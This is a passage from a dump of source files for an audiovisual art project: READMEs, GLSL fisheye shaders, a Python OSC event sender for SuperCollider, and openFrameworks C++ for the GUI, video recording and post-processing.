"is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1387, "license_type": "no_license", "max_line_length": 220, "num_lines": 28, "path": "/Music/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "We are working with [Ambisonic surround sound](https://en.wikipedia.org/wiki/Ambisonics) in this project, and to make things easier we use the Ambisonic Toolkit (ATK) which offers a great number of encoders and decoders.\n\nCheck [Introducing the Ambisonic Toolkit](http://www.ambisonictoolkit.net/Help/Guides/Intro-to-the-ATK.html) if you want to get more info.\n\n\nYou have to install [SC plugins](https://github.com/supercollider/sc3-plugins) (which includes ATK) to get the examples working.\nFollow the installation instructions at their [github repository](https://github.com/supercollider/sc3-plugins).\n\nSome quick tips to build from source:\n\n    git clone https://github.com/supercollider/supercollider.git\n    git clone https://github.com/supercollider/sc3-plugins.git\n    cd sc3-plugins\n    git submodule init && git submodule update\n    mkdir build && cd build\n    cmake -DSC_PATH=../../supercollider ..\n    make\n    make install\n    mv SC3plugins /path/to/sc3-extensions #(you find out which one that is by evaluating Platform.userExtensionDir from within SuperCollider).\n\n\n\nAlso make sure that `MathLib` is installed. 
You can do so by executing `Quarks.gui` in the SuperCollider IDE.\nYou should recompile the class library after installing `MathLib` (Language -> Recompile Class Library).\n\nHere's a diagram of the ATK infrastructure we'll use:\n\n![lhcvmm Atk Infrastructure](lhcvmm_atk_infrastructure.png)\n" }, { "alpha_fraction": 0.8030303120613098, "alphanum_fraction": 0.8060606122016907, "avg_line_length": 109.05555725097656, "blob_id": "399ce603b0baea6be62101fbf257e8c7785a15db", "content_id": "ce1156be652e2558554ff0b41f5683e64ad1ed42", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1980, "license_type": "permissive", "max_line_length": 530, "num_lines": 18, "path": "/Graphics/addons/ofxVideoRecorder/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#ofxVideoRecorder\n\n##Original addon version: https://github.com/timscaffidi/ofxVideoRecorder\n\n###a fast multi-threaded video recording extension using ffmpeg.\nMulti-threaded design allows your app to run at full speed while worker threads pipe video and/or audio data to an instance of ffmpeg. If both audio and video recording is enabled, A/V synchronization is maintained by dynamically adding or skipping frames of video when needed to match the pace of the incoming audio stream; this feature compensates for inconsistent incoming frame-rates (from a camera which adjusts shutter-speed in low light, for example) and produces a stable output frame-rate with no synchronization problems.\n\nofxVideoRecorder relies on [ffmpeg](http://ffmpeg.org), the cross-platform command line program for A/V encoding/decoding. You must have ffmpeg installed in either your system's path directories or in a custom location using the setFfmpegLocation() function (your data folder for example).\n\n##Usage\n1. Set up the video recorder. Several setup functions exist from simple to advanced. 
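(For orientation only, a minimal sketch of the simple case — the exact overloads live in the addon header and the signature here is an assumption, not verified: `vidRecorder.setup(\"testMovie.mov\", 1024, 768, 30)` would record video only, while the audio-capable variants additionally take a sample rate and channel count.) 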
The setup function will create audio and video pipe files if necessary, launch A/V worker threads, and the main ffmpeg encoding thread.\n2. Add frames and/or audio data.\n\t* Give the recorder ofPixels objects that match the size you set it up at.\n\t* Currently only supports RGB, 8 bits/channel. \n\t* Currently only supports ofSoundStream audio streams. Support for recording audio produced by ofSoundPlayer or ofVideoPlayer is not in openFrameworks yet. To record these sounds you will need to use a microphone or an audio cable to loop back to the sound card.\n3. Close the recorder. This closes the pipes and stops the worker threads; once all input pipes are closed, ffmpeg stops listening for new data and will also return.\n4. Go to step 1 to start a new video recording.\n\t* Should also support multiple output streams using multiple recorder objects. A new pair of pipes will be created for each object's output." }, { "alpha_fraction": 0.7952622771263123, "alphanum_fraction": 0.8020304441452026, "avg_line_length": 48.25, "blob_id": "290ce6df7d4aa6ec9fe4fbc18635f7d2a90391f9", "content_id": "ffb4c53ae8015bc12c775f16a7a5ecc1f5cf82e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 595, "license_type": "no_license", "max_line_length": 234, "num_lines": 12, "path": "/Graphics/apps/videoTest_BA_Planetarium/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# Video Test for BA Planetarium\n\n###Description\n15” video sample for testing and calibrating the BA Planetarium Full Dome projection system. It’s designed for testing Linear, Concentric and Rotating motion with Fisheye Fx filters. \n\n###Dependencies\n\n* addons: ofxVideoRecorder, ofxFisheye\n* common_classes: VideoRenderer, ImageSaverThread\n\n### Compilation\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9 (www.openFrameworks.com). A typical build invocation is sketched below.
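As a sketch (assuming the standard openFrameworks project makefiles shipped with OF 0.9; target names may vary between OF versions):\n\n    cd OF_ROOT_DIR/apps/lhcvmm/Graphics/apps/videoTest_BA_Planetarium\n    make\n    make RunRelease\n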
To compile the examples in this repository you need to clone lhcvmm main directory into OF apps dir (OF_ROOT_DIR/apps/lhcvmm/Graphics/)\n" }, { "alpha_fraction": 0.3471638560295105, "alphanum_fraction": 0.3739495873451233, "avg_line_length": 28.292306900024414, "blob_id": "197b65800067d35cdf11892f18b300ecf247a182", "content_id": "92a7e8b22df95faf1574b3a45b84da0195ae5b22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1904, "license_type": "no_license", "max_line_length": 99, "num_lines": 65, "path": "/Graphics/addons/ofxFisheye/src/fxBarrelDist.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "/*\n Shader based on http://github.prideout.net/barrel-distortion/\n */\n\n#pragma once\n\n#define STRINGIFY(A) #A\n\n#include \"ofMain.h\"\n\n\nclass fxBarrelDist{\npublic:\n \n string gl2FragmentShader;\n \n fxBarrelDist(){\n\n gl2FragmentShader = \"#version 120\\n\"; // For some reason \"#version 120\\n\" makes this break.\n gl2FragmentShader += STRINGIFY(\n \n uniform sampler2DRect tex0;\n uniform float width;\n uniform float height;\n \n uniform float amount = 1.5;//barrelPower (0.0-2.0)\n \n const float PI = 3.1415926535;\n \n \n vec2 Distort(vec2 p)\n {\n float theta = atan(p.y, p.x);\n float radius = length(p);\n radius = pow(radius, amount);\n p.x = radius * cos(theta);\n p.y = radius * sin(theta);\n return 0.5 * (p + 1.0);\n }\n \n \n void main(){\n \n vec2 texCoordNorm = vec2(gl_TexCoord[0].s/width ,gl_TexCoord[0].t/height);\n \n vec2 uv;\n vec2 xy = 2.0 * texCoordNorm - 1.0;\n \n float d = length(xy);\n \n if (d < 1.0){\n uv = Distort(xy);\n }else{\n uv = texCoordNorm;\n }\n \n vec2 texCoordRescaled= vec2(uv.x * width, uv.y*height);\n vec4 color = texture2DRect(tex0, texCoordRescaled);\n gl_FragColor = color;\n \n }\n \n );\n }\n};\n" }, { "alpha_fraction": 0.6118385195732117, "alphanum_fraction": 0.6271139979362488, "avg_line_length": 33.91428756713867, "blob_id": "63a4e8ac0e354ee0318bbf08aceaba990b2287c3", "content_id": "687d3658155e4b3fad9dd3b8e9418795a92b3f1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7332, "license_type": "no_license", "max_line_length": 136, "num_lines": 210, "path": "/Data/smalley.py", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "import time\nimport sys\nfrom thread import start_new_thread\nfrom OSC import OSCClient, OSCClientError, OSCBundle, OSCMessage\nfrom random import random, choice, uniform\nimport argparse\nimport csv\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument('-c','--csv', help='Load events from csv.', action='store_false')\nparser.add_argument('-r','--random', help='Send random events. 
(will use a list otherwise)', action='store_true')\nparser.add_argument('-l','--loop', help='Loop events sequence.', action='store_true')\n\nargs = parser.parse_args()\n\ncsv_data = []\n# columns that must be converted to float\nfloat_indexes = [0,2,8,9,10,13,14,15,16,19,25,26,27,30,31,32,33,36,42,43,44,47,48,49,50]\nwith open('data_files/smalley.csv', 'rb') as csvfile:\n csv = csv.reader(csvfile, delimiter=',', quotechar='\"')\n csv.next() # first row\n csv.next() # and second row are headers\n for row in csv:\n for i, val in enumerate(row):\n if i in float_indexes:\n try:\n row[i] = float(row[i].replace(\",\", \".\"))\n except:\n row[i] = 0\n\n csv_data.append(row)\n\n\nosc_port = 57120 #default SuperCollider port (must be open before executing this program)\n# just some easy ansi colors printing: 'o' for ok, 'w' for warning, 'e' for error.\ndef printc(t, c='o'):\n print '\\033[9' + {'o': '2m','w': '3m','e': '1m'}[c] + t + '\\033[0m'\n\nonsets = ['','departure','emergence','anacrusis','attack','upbeat','downbeat']\ncontinuants = ['','passage','transition','prolongation','maintenance','statement']\nterminations = ['','arrival','disappearence','closure','release','resolution','plane']\nmorfological_functions = [onsets,continuants,terminations]\nduration_ranges = [ [0.01, 0.3], [0.4, 2], [0.2, 0.5]]\n\nunidirectional_motions = ['','ascent','plane','descent']\nreciprocal_motions = ['','parabola','oscilation','ondulation']\ncyclic_motions = ['','rotation','spiral','spin','vortex','pericentrality','centrifugal']\ncharacteristic_motions = ['','push','flow','rise','throw','drift','float','fly','plummet','dive','fall','tumble','sink','glide','slump']\n\ntexture_motion_relationships = ['','streaming', 'flocking', 'convolution','turbulence']\n\nspectrums = ['harmonic', 'inharmonic','granular','saturated']\nspectral_occupation_types = ['canopy', 'centre', 'root']\nspectral_densities = ['filled', 'packed', 'opaque','translucent','transparent','empty']\n\n# https://docs.google.com/feeds/download/spreadsheets/Export?key=16FjhAmzO4CZyGDEJfdMguKVnG9FgMQe8M04X5MLigR4&exportFormat=csv\n\n\n\ndef send_event(data):\n try:\n bundle = OSCBundle()\n msg = OSCMessage(\"/sound_unit\")\n for d in data:\n msg.append(d)\n\n bundle.append(msg)\n client.send(bundle)\n\n except OSCClientError, e:\n printc( \"\\OSCClientError: Connection refused on port %s.\" % osc_port, 'e')\n\n\ndef send_random_event():\n data = []\n\n for i in range(3):\n #onset, continuant, termination\n data.append(choice(morfological_functions[i]))\n #duration\n data.append(uniform(duration_ranges[i][0],duration_ranges[i][1]))\n # unidirectional_motions\n data.append(choice(unidirectional_motions))\n # reciprocal_motions\n data.append(choice(reciprocal_motions))\n # cyclic_motions\n data.append(choice(cyclic_motions))\n # characteristic_motions\n data.append(choice(characteristic_motions))\n\n # texture motion\n data.append(choice(texture_motion_relationships))\n data.append(uniform(0, 1)) # continuity-discontinuity (sustained -> granular -> iterative)\n data.append(uniform(0, 1)) # movement: periodic - aperiodic erratic\n data.append(uniform(0, 1)) # movement: accelerating - decelerating - flux\n\n # spectrum type\n data.append(choice(spectrums))\n\n #spectral occupation type\n data.append(choice(spectral_occupation_types))\n #spectral qualifiers\n data.append(uniform(0, 1)) # emptiness - plenitude\n data.append(uniform(0, 1)) # diffuseness - concentration\n data.append(uniform(0, 1)) # streams - interstices\n data.append(uniform(0, 1)) # overlap 
- crossover\n\n #spectral density\n data.append(choice(spectral_densities))\n\n send_event(data)\n\n\ntry:\n #initialize osc client\n client = OSCClient()\n client.connect(('127.0.0.1', osc_port)) # connect to SuperCollider\n\n starttime=time.time()\n\n if args.random:\n interval = 1.12 # time between events, in seconds\n print \"Start Sending events every %s seconds.\" % interval\n print \"Each * printed represents an event sent.\"\n print \"Press Ctrl + C to finalize.\"\n while 1:\n # restart * printing every 10 events\n sys.stdout.write('\\r----------\\r')\n for i in range(0, 10):\n send_random_event()\n time_to_sleep = interval - ((time.time() - starttime) % interval)\n sys.stdout.write('*')\n sys.stdout.flush()\n time.sleep(time_to_sleep)\n\n if args.csv:\n print \"Start Sending events from csv file.\"\n print \"Each * printed represents an event sent.\"\n print \"Press Ctrl + C to finalize.\"\n\n while 1:\n\n csv_data_index = 0\n\n sys.stdout.write('\\r')\n for i in range(len(csv_data)):\n sys.stdout.write('-')\n sys.stdout.write('\\r')\n\n for row in csv_data:\n send_event(row[1:])\n sys.stdout.write('*')\n sys.stdout.flush()\n\n time_to_sleep = row[0]\n if time_to_sleep > 0:\n time_to_sleep = time_to_sleep - ((time.time() - starttime) % time_to_sleep)\n time.sleep(time_to_sleep)\n\n if not args.loop:\n break\n\n\nexcept OSCClientError:\n printc( \"\\OSCClientError: Connection refused on port %s.\" % osc_port, 'e')\n\nexcept KeyboardInterrupt:\n print \"\\nProgram terminated.\"\n\n\n'''\n\n\nSound Unit\n\n\tMorfological framework\n\t\tFunction: Onsets, Continuants and Terminations\n\t\tDescription (palabras para cada categoria)\n\t\tDuration (float, en segundos)\n\t\tMotion and Growth\n\t\t\tMotion: unidirectional, reciprocal and cyclic/centric;\n\t\t\tGrowth: bi/multidirectional\n\t\t\tCharacteristics of motion\n\t\tTexture motion :\n relationship: streaming, flocking, convolution and turbulence.\n\t\t\tinternal consistency: continuity-discontinuity continuum\n\t\t\t\t\t\t\t\t(sustained -> granular -> iterative)\n\t\t\tmovement: \to periodic - aperiodic erratic\n\t\t\t\t\t\to accelerating - decelerating - flux\n\t\t\t\t\t\to grouping patterns\n\t\tBehaviour\n\t\t\tmotion coordination (vertical): loose-tight continuum\n\t\t\tmotion passage (Causality, horiz): voluntary-pressured cont.\n\t\t\trelations: dominance/subordination and conflict/coexistence.\n\n\tSpectral framework\n Note to Noise continuum (armonico, inarmonico, granular, saturado)\n (desarrollar esto)\n Occupancy of Spectral Space\n\t type: canopy, centre and root\n qualifiers:\n\t\t o emptiness - plenitude\n\t\t o diffuseness - concentration\n\t\t o streams - interstices\n\t\t o overlap - crossover\n\t\tSpectral Density (filled, packed/compressed, opaque, translucent, transparent and empty)\n\n\n\n'''\n" }, { "alpha_fraction": 0.6067615747451782, "alphanum_fraction": 0.6334519386291504, "avg_line_length": 23.9777774810791, "blob_id": "61a217fdd9362dd22dc8f5272abbd59e7dca365e", "content_id": "bfac0f4e6957330cc918dfc29c34dcb0913c7d41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1124, "license_type": "no_license", "max_line_length": 74, "num_lines": 45, "path": "/Graphics/apps/videoTest_2/src/main.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofMain.h\"\n#include \"ofApp.h\"\n#include \"TimelineApp.h\"\n#include \"ofAppGLFWWindow.h\"\n\n//========================================================================\nint main( 
){\n\n//\tofGLWindowSettings settings;\n//\tsettings.setGLVersion(3,2);\n//\tofCreateWindow(settings);\n \n //classic\n// ofSetupOpenGL(1024, 576, OF_WINDOW);\n//\tofRunApp(new ofApp());\n\n \n \n \n //multi\n ofGLFWWindowSettings settings;\n \n //mainWindow\n settings.width = 1024;\n settings.height = 512;\n settings.setPosition(ofVec2f(300,0));\n settings.resizable = true;\n shared_ptr<ofAppBaseWindow> mainWindow = ofCreateWindow(settings);\n \n //timelineWindow\n settings.width = 576;\n settings.height = 750;\n settings.setPosition(ofVec2f(0,0));\n settings.resizable = false;\n shared_ptr<ofAppBaseWindow> timelineWindow = ofCreateWindow(settings);\n \n shared_ptr<ofApp> mainApp(new ofApp);\n shared_ptr<TimelineApp> timelineApp(new TimelineApp);\n mainApp->timelineApp = timelineApp;\n \n ofRunApp(timelineWindow, timelineApp);\n ofRunApp(mainWindow, mainApp);\n ofRunMainLoop();\n\n}\n" }, { "alpha_fraction": 0.3202221095561981, "alphanum_fraction": 0.34844979643821716, "avg_line_length": 31.74242401123047, "blob_id": "7715d507a3cc390cb4c57a8b7707e59975ef4f37", "content_id": "22b206512aa9c3fac1f3f39d3df28e83a3d2c17a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2161, "license_type": "no_license", "max_line_length": 99, "num_lines": 66, "path": "/Graphics/addons/ofxFisheye/src/fxFixFisheye.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "/*\n Shader based on http://paulbourke.net/dome/fisheye/\n */\n#pragma once\n\n#define STRINGIFY(A) #A\n\n#include \"ofMain.h\"\n\n\nclass fxFixFisheye{\npublic:\n \n string gl2FragmentShader;\n \n fxFixFisheye(){\n\n gl2FragmentShader = \"#version 120\\n\"; // For some reason \"#version 120\\n\" makes this break.\n gl2FragmentShader += STRINGIFY(\n \n uniform sampler2DRect tex0;\n uniform float width;\n uniform float height;\n \n uniform float amount = 178.0;//aperture (0.0 - 180.0)\n \n const float PI = 3.1415926535;\n \n \n void main(){\n \n vec2 texCoordNorm = vec2(gl_TexCoord[0].s/width ,gl_TexCoord[0].t/height);\n \n float apertureHalf = 0.5 * amount * (PI / 180.0);\n float maxFactor = sin(apertureHalf);\n \n vec2 uv;\n vec2 xy = 2.0 * texCoordNorm - 1.0;//center coords\n \n float d = length(xy);\n \n if (d < 2.0-maxFactor){\n d = length(xy * maxFactor);\n float z = sqrt(1.0 - d * d);\n float r = atan(d, z) / PI;\n float phi = atan(xy.y, xy.x);\n \n uv.x = r * cos(phi) + 0.5;\n uv.y = r * sin(phi) + 0.5;\n \n }else{\n discard;\n\n //uv = texCoordNorm;\n }\n \n vec2 texCoordRescaled= vec2(uv.x * width, uv.y*height);\n vec4 color = texture2DRect(tex0, texCoordRescaled);\n gl_FragColor = color;\n \n \n }\n \n );\n }\n};\n" }, { "alpha_fraction": 0.4900737404823303, "alphanum_fraction": 0.571752667427063, "avg_line_length": 32.92307662963867, "blob_id": "318b4b0e8a9d0b8cc5ec19ffab859d5c6d67fbc7", "content_id": "4fc1b46669c006ed11288e23fcef785b416f9faf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1763, "license_type": "no_license", "max_line_length": 85, "num_lines": 52, "path": "/Graphics/apps/videoTest_2/src/GuiManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "//\n// GuiManager.h\n// videoTest_2\n//\n// Created by Leo on 4/13/16.\n//\n//\n\n#include \"GuiManager.h\"\n\nvoid GuiManager::setup(){\n \n gui.setup();\n gui.add(gMode.setup(\"LINEAL/RADIAL\", false));\n gui.add(gRadMode.setup(\"Concentric/Centrifuge\", false));\n gui.add(gRadDeform.setup(\"Radial Mix\", 0.0, 0.0, 1.0));\n 
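// (editor's note) ofxGui setup() pattern used throughout this file:\n    // sliders are setup(label, initialValue, min, max); toggles are setup(label, initialState).\n    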
\n \n gui.add(gWidth.setup(\"width\", 1.0, 0., 1.0));\n gui.add(gHeight.setup(\"height/radius\", 0.25, 0., 1.0));\n gui.add(gCubesizeUnified.setup(\"cubesize\", 0.25, 0., 1.0));\n //gui.add(gCubesize.setup(\"cubesize\", ofVec3f(0.2), ofVec3f(0.0), ofVec3f(1.0)));\n gui.add(gMaskRadius.setup(\"maskRadius\", 0.0, 0.0, 1.0));\n gui.add(gHres.setup(\"Hres\", 0.3, 0., 1.0));\n gui.add(gVres.setup(\"Vres\", 0.3, 0., 1.0));\n gui.add(gXpos.setup(\"Xpos\", 0.5, 0., 1.0));\n gui.add(gYpos.setup(\"Ypos\", 0.5, 0., 1.0));\n gui.add(gVelocity.setup(\"velocity\", 0.0, 0., 1.0));\n //nz\n gui.add(gNzTime.setup(\"nzTime\", 0.1, 0.0, 1.0));\n \n gui.add(gNzXAmp.setup(\"nzXAmp\", 0.0, 0.0, 1.0));\n gui.add(gNzXFreq.setup(\"nzXFreq\", 0.5, 0.0, 1.0));\n gui.add(gNzXRug.setup(\"nzXRug\", 0.05, 0.01, 1.0));\n \n gui.add(gNzYAmp.setup(\"nzYAmp\", 0.0, 0.0, 1.0));\n gui.add(gNzYFreq.setup(\"nzYFreq\", 0.5, 0.0, 1.0));\n gui.add(gNzYRug.setup(\"nzYRug\", 2.0, 0.01, 30.0));\n \n gui.add(gNzZAmp.setup(\"nzZAmp\", 0.0, 0.0, 1.0));\n gui.add(gNzZFreq.setup(\"nzZFreq\", 0.5, 0.0, 1.0));\n gui.add(gNzZRug.setup(\"nzZRug\", 0.05, 0.01, 1.0));\n //\n gui.add(gUseCam.setup(\"useCam\", false));\n gui.add(gAxis.setup(\"axis\", false));\n gui.add(gUseLight.setup(\"useLight\", false));\n gui.add(gLightPos.setup(\"LighPos\", ofVec3f(0.5), ofVec3f(0.0), ofVec3f(1.0)));\n}\n//-------------------------\nvoid GuiManager::draw(){\n gui.draw();\n}" }, { "alpha_fraction": 0.5216563940048218, "alphanum_fraction": 0.5431665182113647, "avg_line_length": 31.542856216430664, "blob_id": "4866dd883077a8cb4f932eae79a6fd09ac86ec65", "content_id": "e70e1230a7589d834e450f8e5a34431911e74086", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6834, "license_type": "no_license", "max_line_length": 257, "num_lines": 210, "path": "/Graphics/apps/final/src/VideoRenderer.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"VideoRenderer.h\"\n\nvoid VideoRenderer::setup(int iFramerate, RecordingMode initMode, Resolution initRes){\n \n // global variables setup\n bIsRecording = false;\n framerate = iFramerate;\n currentRecMode = initMode;\n currentOutResolution = initRes;\n pngFirstFrame = true;\n \n \n //Fbo y buffers initial setup\n setOutputResolution(currentOutResolution);\n \n \n //videoRecorder setup---------------------------------\n fileName = \"movFiles/testMovie\";\n fileExt = \".mov\"; // ffmpeg uses the extension to determine the container type. 
run 'ffmpeg -formats' to see supported formats\n // override the default codecs if you like\n // run 'ffmpeg -codecs' to find out what your implementation supports (or -formats on some older versions)\n //vidRecorder.setVideoCodec(\"mpeg4\");\n vidRecorder.setVideoCodec(\"libx264\");//h264 codec\n vidRecorder.setVideoBitrate(\"800k\");\n vidRecorder.setAudioCodec(\"mp3\");\n vidRecorder.setAudioBitrate(\"192k\");\n \n ofAddListener(vidRecorder.outputFileCompleteEvent, this, &VideoRenderer::recordingComplete);\n}\n//------------------------------\nvoid VideoRenderer::update(){\n \n if(bIsRecording){\n if (currentRecMode == PNG_SEQUENCE) {\n \n if(!pngFirstFrame){\n // wait for the thread to finish saving the\n // previous frame and then unmap it\n saverThread.waitReady();\n pixelBufferBack.unmap();\n }\n \n // copy the fbo texture to a buffer\n fbo.getTexture().copyTo(pixelBufferBack);\n \n // bind and map the buffer as PIXEL_UNPACK so it can be\n // accessed from a different thread from the cpu\n // and send the memory address to the saver thread\n \n pixelBufferFront.bind(GL_PIXEL_UNPACK_BUFFER);\n unsigned char * p = pixelBufferFront.map<unsigned char>(GL_READ_ONLY);\n \n saverThread.save(p);\n \n // swap the front and back buffer so we are always\n // copying the texture to one buffer and reading\n // back from another to avoid stalls\n swap(pixelBufferBack,pixelBufferFront);\n \n pngFirstFrame = false;\n \n \n }else if(currentRecMode == MOV_FILE){\n \n fbo.getTexture().readToPixels(pixels);\n bool success = vidRecorder.addFrame(pixels);\n if (!success) {\n ofLogWarning(\"This frame was not added!\");\n }\n \n }\n \n }\n \n // Check if the video recorder encountered any error while writing video frame or audio smaples.\n if (vidRecorder.hasVideoError()) {\n ofLogWarning(\"The video recorder failed to write some frames!\");\n }\n \n if (vidRecorder.hasAudioError()) {\n ofLogWarning(\"The video recorder failed to write some audio samples!\");\n }\n\n}\n//------------------------------\nvoid VideoRenderer::draw(int x, int y, int w, int h){\n \n fbo.draw(x, y, w, h);\n\n}\n//------------------------------\nvoid VideoRenderer::exit(){\n ofRemoveListener(vidRecorder.outputFileCompleteEvent, this, &VideoRenderer::recordingComplete);\n vidRecorder.close();\n}\n//--------------------------------------------------------------\nvoid VideoRenderer::startRecording(){\n bIsRecording = true;\n \n saverThread.setLastFrameMarker(ofGetFrameNum());\n saverThread.frameNumOffset = frameNumOffset;\n \n \n if(currentRecMode == MOV_FILE){\n if(!vidRecorder.isInitialized()) {\n //vidRecorder.setup(fileName+ofGetTimestampString()+fileExt, vidGrabber.getWidth(), vidGrabber.getHeight(), 30, sampleRate, channels);\n vidRecorder.setup(fileName+ofGetTimestampString()+fileExt, fbo.getWidth(), fbo.getHeight(), framerate); // no audio\n // vidRecorder.setup(fileName+ofGetTimestampString()+fileExt, 0,0,0, sampleRate, channels); // no video\n // vidRecorder.setupCustomOutput(vidGrabber.getWidth(), vidGrabber.getHeight(), 30, sampleRate, channels, \"-vcodec mpeg4 -b 1600k -acodec mp2 -ab 128k -f mpegts udp://localhost:1234\"); // for custom ffmpeg output string (streaming, etc)\n \n // Start recording\n vidRecorder.start();\n }\n }\n ofLogNotice(\"-RECORDING STARTED\");\n}\n//--------------------------------------------------------------\nvoid VideoRenderer::stopRecording(){\n bIsRecording = false;\n if(currentRecMode == MOV_FILE) vidRecorder.close();\n ofLogNotice(\"-RECORDING 
ENDED\");\n}\n//--------------------------------------------------------------\nvoid VideoRenderer::setOutputResolution(Resolution res){\n \n currentOutResolution = res;\n \n fbo.clear();\n pixels.clear();\n pixelBufferBack.unmap();\n pixelBufferFront.unmap();\n \n switch (res) {\n case r256:\n fbo.allocate(256, 256, GL_RGB);\n break;\n case r512:\n fbo.allocate(512, 512, GL_RGB);\n break;\n case r1024:\n fbo.allocate(1024, 1024, GL_RGB);\n break;\n case r2048:\n fbo.allocate(2048, 2048, GL_RGB);\n break;\n case r4096:\n fbo.allocate(4096, 4096, GL_RGB);\n break;\n \n default:\n break;\n }\n \n \n saverThread.setImageSize(fbo.getWidth(), fbo.getHeight());\n pixelBufferBack.allocate(fbo.getWidth()*fbo.getHeight() *3, GL_DYNAMIC_READ);\n pixelBufferFront.allocate(fbo.getWidth()*fbo.getHeight()*3, GL_DYNAMIC_READ);\n}\n//--------------------------------------------------------------\nvoid VideoRenderer::recordingComplete(ofxVideoRecorderOutputFileCompleteEventArgs& args){\n cout << \"The recoded video file is now complete.\" << endl;\n}\n//--------------------------------------------------------------\nstring VideoRenderer::getRecordingModeAsString(){\n \n string s;\n \n switch (currentRecMode) {\n case PNG_SEQUENCE:\n s = \"SECUENCIA PNG\";\n break;\n case MOV_FILE:\n s = \"MOV-H264\";\n break;\n \n default:\n break;\n }\n \n return s;\n}\n//--------------------------------------------------------------\nstring VideoRenderer::getResolutionAsString(){\n \n string s;\n \n switch (currentOutResolution) {\n case r256:\n s = \"256x256\";\n break;\n case r512:\n s = \"512x512\";\n break;\n case r1024:\n s = \"1024x1024\";\n break;\n case r2048:\n s = \"2048x2048\";\n break;\n case r4096:\n s = \"4096x4096\";\n break;\n \n default:\n break;\n }\n \n return s;\n \n}" }, { "alpha_fraction": 0.5883110165596008, "alphanum_fraction": 0.6078784465789795, "avg_line_length": 29.57480239868164, "blob_id": "2d55dec160fc84d35ade16061992bf5fc8af15f9", "content_id": "0309b8fa2e0ee3c0e2660dcf27503b9e44ee8d9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3884, "license_type": "no_license", "max_line_length": 74, "num_lines": 127, "path": "/Graphics/apps/videoTest_3/src/PostProcessingManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"PostProcessingManager.h\"\n\n//TODO: add more efects and parameters\n//TODO: add gui listener for update, not update everyframe\n\n\n//---------------------------------------\nvoid PostProcessingManager::setup(int w, int h){\n \n post.init(w, h);\n \n //0-Fxaa\n post.createPass<FxaaPass>()->setEnabled(false);\n //1-Bloom\n post.createPass<BloomPass>()->setEnabled(false);\n //2-dof\n dof = post.createPass<DofPass>();\n dof->setAperture(0.2);\n dof->setMaxBlur(0.05);\n dof->setEnabled(false);\n //3-Kaleidoscopes\n post.createPass<KaleidoscopePass>()->setEnabled(false);\n //4-Noisewarp\n post.createPass<NoiseWarpPass>()->setEnabled(false);\n //5-Pixelate\n post.createPass<PixelatePass>()->setEnabled(false);\n //6-EdgePass\n post.createPass<EdgePass>()->setEnabled(false);\n //7-VerticalTilt\n post.createPass<VerticalTiltShifPass>()->setEnabled(false);\n //8-GodRays\n godRays = post.createPass<GodRaysPass>();\n godRays->setLightDirDOTviewDir(0.3);\n godRays->setEnabled(false);\n //9-LimbDarkening\n limbDarkening=post.createPass<LimbDarkeningPass>();\n limbDarkening->setEnabled(false);\n //10-Ssao\n ssao=post.createPass<SSAOPass>();\n ssao->setAoClamp(0.65);\n 
ssao->setLumInfluence(0.25);\n    ssao->setEnabled(false);\n    \n    //---------\n    setupGui();\n    \n\n}\n//---------------------------------------\nvoid PostProcessingManager::updateValues(){\n    \n    //TODO: check pointers are not null\n    \n    post[0]->setEnabled(gDoFxaa);\n    post[1]->setEnabled(gDoBloom);\n    post[2]->setEnabled(gDoDof);\n    post[3]->setEnabled(gDoKaleidoscope);\n    post[4]->setEnabled(gDoNoiseWarp);\n    post[5]->setEnabled(gDoPixelate);\n    post[6]->setEnabled(gDoEdgePass);\n    post[7]->setEnabled(gDoVerticalTiltShift);\n    post[8]->setEnabled(gDoGodRays);\n    post[9]->setEnabled(gDoLimbDarkening);\n    post[10]->setEnabled(gDoSsao);\n    \n    \n    dof->setAperture(gDofAperture);\n    dof->setMaxBlur(gDofMaxBlur);\n    dof->setFocus(gDofFocus);\n    \n    godRays->setLightDirDOTviewDir(gGodRaysLightDotView);\n    \n    ssao->setAoClamp(gSsaoAoClamp);\n    ssao->setLumInfluence(gSsaoLumInfluence);\n    \n    \n    \n}\n//---------------------------------------\nvoid PostProcessingManager::setupGui(){\n    gui.setup(\"postProcessing\");\n    \n    gui.add(gDoFxaa.setup(\"Fxaa\", true));\n    \n    gui.add(gDoBloom.setup(\"Bloom\", true));\n    \n    gui.add(gDoDof.setup(\"Dof\", false));\n    gui.add(gDofFocus.setup(\"Dof-Focus\", 0.9, 0.0, 1.0));\n    gui.add(gDofAperture.setup(\"Dof-Aperture\", 0.2, 0.0, 1.0));\n    gui.add(gDofMaxBlur.setup(\"Dof-MaxBlur\", 0.05, 0.0, 1.0));\n    \n    gui.add(gDoKaleidoscope.setup(\"Kaleidoscope\", false));\n    gui.add(gDoNoiseWarp.setup(\"NoiseWarp\", false));\n    gui.add(gDoPixelate.setup(\"Pixelate\", false));\n    gui.add(gDoEdgePass.setup(\"EdgePass\", false));\n    